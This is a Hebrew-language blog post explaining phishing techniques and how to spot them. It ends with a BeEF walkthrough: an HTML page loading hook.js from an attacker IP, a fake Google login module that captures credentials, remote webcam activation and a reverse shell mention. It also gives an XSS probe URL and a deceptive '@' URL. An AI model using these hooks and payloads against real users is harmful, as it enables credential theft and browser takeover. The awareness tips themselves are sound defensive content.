מהו פישינג? וכיצד עובד Beef?

פישינג הוא ניסיון לגניבת מידע על ידי התחזות. המידע שימסר לגורם שלישי יכול להיות סודי כגון שמות משתמשים וסיסמאות אך גם מידע על סידורי אבטחה, שמות של מסמכים, מדינויות סיסמאות, תבנית הדואר האלקטרוני, תפקידי מפתח ועוד. הדיוג מתבצע לרוב על ידי התחזות לגורם לגיטימי ומוכר המנסה "לדוג" מידע מהקורבן בדרכים המוכרות לו כגון: תכתובות סמס, צ'אט במדיה החברתית, דואר אלקטרוני ארגוני או של אתר אינטרנט מוכר ועוד.
דרך נתיבים לגיטימים אלה משכנע התוקף את הקורבן לבצע פעולה שתוביל אותו לאתר זדוני המדמה אתר אמיתי (פייסבוק, גימייל, איביי, חשבון בנק, פייפאל ועוד) לאחר שהקורבן ימלא את פרטיו הם ישלחו באופן אוטומטי אל התוקף.





כיום, יש מספר שיטות פשוטות לבצע דיוג:
* דואר זבל: ("שיטת מצליח") באמצעות שיטה זו, שולח התוקף עשרות פניות לקורבנות שונים, הפניות יהיו כלליות מכיוון שאין באפשרותו של התוקף לדעת את שמו האמיתי או את שם המשתמש של הקורבן ולכן הוא ישלח הודעה כללית.
XSS Reflected / Stored: הפגיעות מתרחשת כאשר דף מקבל כקלט סימנים מיוחדים שעשוים להרכיב תגים וסקריפטים אך הקלט אינו מסונן ומאומת כראוי, מתייחס לקוד הזדוני כאל קוד לגיטימי של האתר ומריץ את הקוד. בשיטה זו ניתן להוסיף שדות חדשים לשנות את הקוד ובכך להערים על הקורבן.
www.12345.com/contact.php?email=<script>alert()</script>

* שכפול אתרים לאתרים מזויפים: אלו הם דפים ששוכפלו מאתרים לגיטימים אך לא נחשבים חלק מהאתר המקורי. כפי שניתן לראות בתמונה עמוד ההתחברות נראה בדיוק כמו זה של פייסבוק. לאחר שהקורבן ימלא את פרטיו הוא מופנה באופן אוטומטי לאתר האמיתי אך פרטיו נשלחים גם לתוקף.


* שינוי במבנה קישורים: שיטה זו משולבת בתכתובת דואר אלקטרוני כאשר הלינק שמוזן בו מטעה את המשתמש וגורם לו לחשוב שהוא מוביל לאתר לגיטימי אך הוא בעצם מוביל לאתר מתחזה.


בנוסף, מרבים התוקפים להשתמש בדומיינים דומים למקור לדוגמה:
* googel.com
* facebooc.uk
* face-book.ui
* www.tweeter.dt
* www.lindekin.xd


* סימנים מיוחדים:
שימוש בדומיין googlemail במקום gmail.

@ שימוש בשטרודל בעת הגלישה יוביל את הגולש לאתר שונה ממה שמוקלד במקור לדוגמה:
http://www.google.com@www.omegaton.com
האתר שיפתח הוא www.omegaton.com ולא גוגל.

. השימוש בנקודה בשם משתמש בתיבת ג'ימייל הוא לפרוטוקול בלבד. כך שהכתובת omega.ton@gmail.com זהה בדיוק לכתובת omegato.n@gmail.com.


+ הוספת פלוס בכתובת הדוא"ל ולאחריו מספרים או אותיות myemail+facebook@gmail.com תעזור לנו לגלות מאיזה אתר מגיע אלינו דואר זבל. כל מה שכתוב אחרי הפלוס ימחק באופן אוטומטי.

הקמתי מייל לדוגמה: mledugma@gmail.com.
נצא מנקודת הנחה שפייסבוק מוכרת את כל רשימות המייל לארגון צד שלישי.
אותו ארגון מחליט לשלוח לי ספאם (הודעות על הלוואות, ירושה מאפריקה וכו').
כשאני נרשם לפייסבוק או לכל אתר אחר אני יכול להוסיף את שם הארגון לאחר הפלוס.

לאחר ההרשמה כל המיילים שישלחו אליי יגיעו עם facebook+ זאת אומרת, במידה ומחר יגיעו אליי פרסומות עם mledugma+facebook@gmail.com אני אדע שאותו ספאמר הגיע דרך פייסבוק.



ניתן לצפות במקור ההודעה ולבדוק את ה-Header באמצעות לחיצה על החץ בצידו השמאלי של ההודעה ולאחן מכן הצג מקור.


כיצד ניתן לזהות פישינג?
לפישינג פנים רבות ומגוונות, יש לשים לב למספר נקודות לפני שממהרים למלא את הפרטים:
1. בדיקת כתובת URL, אתרים גדולים חייבים להיות מאובטחים (HTTPS).


2. לשים לב שהכתובת אליה מתכוונים להגיע היא אכן נכונה.



3. לא לשתף פעולה עם גורמים זרים המציעים שירותים והטבות (כמו ירושה או זכיה בלוטו).


4. לא לפתוח קבצים גם אם זה ממקור ידוע, לפני שמוודאים מה תוכן הקובץ והאם אכן שלחו את זה. (גם אם כתוב שזאת קבלה עבור תשלום בסך 5000 דולר).


4. לבדוק לאן מוביל הקישור לפני שלוחצים עליו



5. לא להילחץ כשאומרים שהחשבון מושהה ולוודא שתוכן ההודעה אינו כללי מידי (שיטת מצליח).

5. כתובת האימייל אינה רשמית: תכתובת אימייל מפייסבוק תגיע מכתובת adrianbridhfur@gmail.com


6. שימו לב לסימנים כמו / \ ולאותיות I או L שעשויות להיראות לפעמים אותו הדבר, כמו כן גם לספרה 0 והאות O.


5. שימו לב לשפה לפעמים יש שימוש אגרסיבי במתרגמים אוטומטיים כגון: Google Translate ועוד.

6. היזהרו מפופאפים בעת הגלישה (לא זכיתם באייפון 9 גם אם אמרו שכן) והזדרזו לצאת מהם ככל האפשר.


7. הימנעו מהורדת קראקים גם אם כתוב שזה מותאם למשחקים שעתידים לצאת בעוד כמה שנים טובות.


6. בדיקת הדומיין באתר Virus Total.

7. בדיקת כתובת ה-IP במאגרי ההונאות (Abuse)


8. אם בטעות לחצתם ומלאתם פרטים: החליפו סיסמה באופן מיידי!
9. הגדירו אימות דו שלבי המחייב אימות נוסף בעזרת קוד PIN אישי.

העתקה וזיוף אתרים באמצעות Beef:
Beef הוא כלי לבדיקות אבטחה וניצול חולשות של יישומי אינטרנט. הכלי מבוסס קוד פתוח, נכתב בשפות JavaScript / Ruby ופותח על ידי וויד אלקורן (Wade Alcorn).

הכלי נחשב לנדבך חשוב בעת ביצוע מבדקי חדירה אפליקטיבים ובעזרתו ניתן לבדוק יישומי אינטרנט בצד הלקוח. כמו כן הוא בעל יכולת זיהוי פגיעות XSS ובמידה ונמצאה פגיעות ניתן להזריק קוד זדוני ישירות דרכו.

ביף מגיע באופן מובנה בהפצת קאלי לינוקס אך ניתן להתקינו במערכות הפעלה נוספות.
הפעלת ביף בקאלי לינוקס תתבצע על ידי לחיצה על האייקון בסרגל הכלים או על ידי כתיבת beef בשורת הפקודה.

דפדפן האינטרנט יפתח באופן אוטומטי ויציג את עמוד הכניסה.
שם משתמש: beef
סיסמה: beef


כעת, כל שעלינו לעשות הוא ליצור דף שיקשר את הקורבן אל המערכת שלנו.
ניתן לשלב את הקישור בעמוד עם תוכן אך בחרתי להשתמש בדוגמה שלהלן:


<html>
      <head>

            <script src="http://<IP>:3000/hook.js" type="text/javascript"></script>

      </head>

</html>
את הקובץ יש לשמור בסיומת HTML ולהריץ בדפדפן (File.html).

 לאחר שהקורבן לחץ על הקישור ניתן לבצע על דפדפן האינטרנט שלו פעולות שונות.
לחיצה כפולה על כתובת ה-IP שלו תפתח לנו סרגל כלים חדש:

נעבור אל לשונית Commands, שם נוכל לראות את כל אותן הפעולות שניתן לבצע על המשתמש.

מקרא פעולות (מופיע בעמוד הראשון):

אם נרצה שלקורבן יוצג עמוד התחברות של ג'ימייל, נעבור אל תיקיית Social Engineering ונבחר Google Phishing, נמלא את הפרטים הרלוונטים ונריץ.

כפי שניתן לראות, במחשבו של הקורבן יופיע עמוד התחברות זהה לעמוד המקורי של גוגל.

במידה והקורבן הזין את פרטי הכניסה, נוכל לראות אותם לאחר לחיצה כפולה על הפקודה שנשלחה.

באמצעות Browser --> Popup Blocker ניתן לזהות אם חוסם הפופאפים פעיל או לא.

ניתן להפעיל מצלמה מרחוק:

חלון התראה לעדכון נתונים:

ניתן לבחור מדיה חברתית ולהקפיץ הודעה שזמן החיבור תם ויש להתחבר בשנית.

לאחר שהקורבן ימלא את הפרטים, הם יופיעו אצלנו על המסך. (בדיוק כמו ג'ימייל).


ניתן לצפות בכל הפעולות שביצע הקורבן תחת לשונית Logs.

יש עוד מגוון רחב של אפשרויות (כולל Bind/Reverse Shell) המותאמות למערכות הפעלה ודפדפנים מגרסאות שונות. ניתן להוריד את התוכנה דרך הלינק הבא: http://beefproject.com

העתקה והורדת אתר באמצעות HTTrack:
תוכנה זו מאפשרת להוריד אתר אינטרנט שלם אל סיפריה מקומית במחשב.
HTTrack מעתיקה את כל התיקיות באופן גורף כולל תמונות.
ניתן להוריד את התוכנה דרך הלינק הבא: www.httrack.com



* תפעול התוכנה הוא פשוט מאוד:
1. הזנת שם לתיקיה אליה יורדו הקבצים.
2. כתיבת הנתיב המלא של התיקיה.
3. איזה פעולה ברצוננו לבצע?

שתף:

פאביו ליאור רחמים

סקרן, אוהב טכנולוגיה ומחשבים מזה שנים רבות וכותב ערכים קבוע בויקיפדיה.